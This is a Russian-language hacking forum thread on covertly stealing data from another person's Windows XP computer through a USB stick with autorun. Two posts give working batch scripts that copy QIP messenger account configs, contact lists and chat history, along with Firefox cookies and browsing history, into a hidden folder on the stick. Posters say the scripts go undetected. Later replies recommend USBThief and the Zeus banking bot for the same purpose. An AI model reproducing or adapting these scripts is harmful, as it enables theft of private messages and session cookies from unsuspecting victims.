bat файл открывающий RDP порт

Есть человек ОС XP антивируса нет ip динамика.
Нужно прописать запуск bat файла в autorun.inf флешки,
a также реализовать открытие rdp порта этим файлом или украсть историю qip 2005, куки firefoxa.

 

Класс, самовнушение очень сильная тема!
Поделишся методой,если получится?

 

анреал

 

http://www.hackzone.ru/articles/vzlom_cherez_telnet.html

 

делюсь

код батника

@echo off
set TOM=D:
set FRFOX="%APPDATA%"\Mozilla\Firefox\Profiles
set QIPUSERDIR="C:\Soft\QIP\Users
set FFPROFILE=mde6kq23.default
set QIPUSER=9416623
set MYFOLDER=ETRIMUS
set MYQIP=qip
set MYMOZ=moz

cd "%PROGRAMFILES%"
md "%MYFOLDER%"
cd "%MYFOLDER%"
md "%MYQIP%"

cd "%QIPUSERDIR%"
copy Accounts.cfg "%PROGRAMFILES%"\"%MYFOLDER%"\"%MYQIP%"\ /y
cd "%QIPUSERDIR%"\"%QIPUSER%"
copy _botq.txt "%PROGRAMFILES%"\"%MYFOLDER%"\"%MYQIP%"\ /y
copy _st_cust.txt "%PROGRAMFILES%"\"%MYFOLDER%"\"%MYQIP%"\ /y
copy %QIPUSER%.cl "%PROGRAMFILES%"\"%MYFOLDER%"\"%MYQIP%"\ /y
copy %QIPUSER%.clg "%PROGRAMFILES%"\"%MYFOLDER%"\"%MYQIP%"\ /y
copy %QIPUSER%.cli "%PROGRAMFILES%"\"%MYFOLDER%"\"%MYQIP%"\ /y
copy %QIPUSER%.clv "%PROGRAMFILES%"\"%MYFOLDER%"\"%MYQIP%"\ /y
copy Config.ini "%PROGRAMFILES%"\"%MYFOLDER%"\"%MYQIP%"\ /y

Он не скрыт тырит файлы кипа сохраняет пока в созданнуую папку в program files , ничем не палится. Нужно точно знать путь до кипа.

 

дороботанный код

@echo off
chcp 1251
set TOM1=C:
set TOM2=E:
set FRFOX="%APPDATA%"\Mozilla\Firefox\Profiles
set QIPUSERDIR=\Soft\QIP\Users
set FFPROFILE=kv2aiqw5.default
set QIPUSER=9416623
set MYFOLDER=ETRIMUS
set MYMOZ=mozETRIM
set MYQIP=qipETRIM
set HIST=historyETRIM
set NOSITEL=%cd%

attrib -a -r -s -h "%NOSITEL%"\*.* /s /d

md "%MYFOLDER%"
cd "%MYFOLDER%"
md "%MYMOZ%"
md "%MYQIP%"\"%HIST%"

%TOM1%
cd "%FRFOX%"\"%FFPROFILE%"

copy cookies.sqlite "%NOSITEL%"\"%MYFOLDER%"\"%MYMOZ%" /y
copy places.sqlite "%NOSITEL%"\"%MYFOLDER%"\"%MYMOZ%" /y

%TOM1%
cd "%QIPUSERDIR%"
copy Accounts.cfg "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%" /y
cd "%QIPUSERDIR%"\"%QIPUSER%"
copy _botq.txt "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%" /y
copy _st_cust.txt "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%" /y
copy %QIPUSER%.cl "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%" /y
copy %QIPUSER%.clg "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%" /y
copy %QIPUSER%.cli "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%" /y
copy %QIPUSER%.clv "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%" /y
copy Config.ini "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%" /y
xcopy "%QIPUSERDIR%"\"%QIPUSER%"\History "%NOSITEL%"\"%MYFOLDER%"\"%MYQIP%"\"%HIST%" /y

attrib +h "%NOSITEL%"\*.* /s /d
attrib -h "%NOSITEL%"\*.* /s

pause > nul

Он не скрыт, не палиться создает в своей директории скрытую папку в которую сохраняет историю кипа и куки, закладки мазилы. Нужно знать путь до qip и название профиля в мазиле.

 

Доступ по RDP на динамическом IP ? ) Ты сам пробывал ? ))

 

А путь до квипа и файрфокса можно попробовать получить через dir и findstr, но это сильно замедлит работу.

 

глупости это все mpr на флешку и в путь

 

MPR не вариант.
Как ты объяснишь хозяину, что ты делаешь?


Легче папку с квипом целиком скопировать на флешку и потом вечерком за чашкой кофе расшифровать.

Вот что я сделал для себя.
http://slil.ru/29517744

Как пользоваться:
Просто вносите в backup.lst что вам нужно "случайно" скопировать.

Результат появится в той же папке и будет называться:
log_%Дата%.exe
Для открытия нужно поменять расширение с exe на rar.

Недостатки:
Появляется черное окно

Можно переделать под firefox, просто правьте backup.lst

 

закинь на флешку USBThief

 

Для таких целей проще закинуть бота Zeus а там уже будут отчеты приходить